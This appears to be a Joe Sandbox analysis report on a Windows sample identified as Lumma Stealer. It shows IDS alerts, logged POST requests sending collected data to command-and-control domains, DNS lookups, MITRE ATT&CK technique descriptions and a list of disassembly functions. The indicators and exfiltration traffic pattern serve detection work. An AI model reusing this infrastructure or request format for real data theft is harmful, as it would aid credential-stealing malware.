Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49729 -> 172.67.187.240:443

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49729 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.187.240:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49748 -> 172.67.187.240:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: occupy-blushi.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: occupy-blushi.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8AE9VENNN7RYOCYOZ7PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12856Host: occupy-blushi.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=63DCI6ZSNTA8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15046Host: occupy-blushi.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SIWABCLOLDE61LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20383Host: occupy-blushi.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PNCJJ9DMPVDVZRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1205Host: occupy-blushi.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K6F7MVXO0IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552792Host: occupy-blushi.sbs

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic	DNS traffic detected: DNS query: frogs-severz.sbs
Source: global traffic	DNS traffic detected: DNS query: occupy-blushi.sbs

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
file.exe

Function 00A9EAEB Relevance: 27.3, APIs: 1, Strings: 17, Instructions: 291
COMMON

Function 00A9DBE5 Relevance: 21.5, Strings: 17, Instructions: 296
COMMON

Function 00AC8690 Relevance: 18.1, APIs: 5, Strings: 5, Instructions: 584
memoryCOMMON

Function 00AA151A Relevance: 16.9, Strings: 13, Instructions: 662
COMMON

Function 00AB19C0 Relevance: 13.1, Strings: 10, Instructions: 618
COMMON

Function 00AB3730 Relevance: 13.0, Strings: 10, Instructions: 534
COMMON

Function 00AB3247 Relevance: 12.1, Strings: 9, Instructions: 814
COMMON

Function 00AB32E2 Relevance: 12.0, Strings: 9, Instructions: 744
COMMON

Function 00ABC4D7 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 500
COMMON

Function 00A9B890 Relevance: 5.4, Strings: 4, Instructions: 442
COMMON

Function 00ABC6B7 Relevance: 3.9, Strings: 3, Instructions: 182
COMMON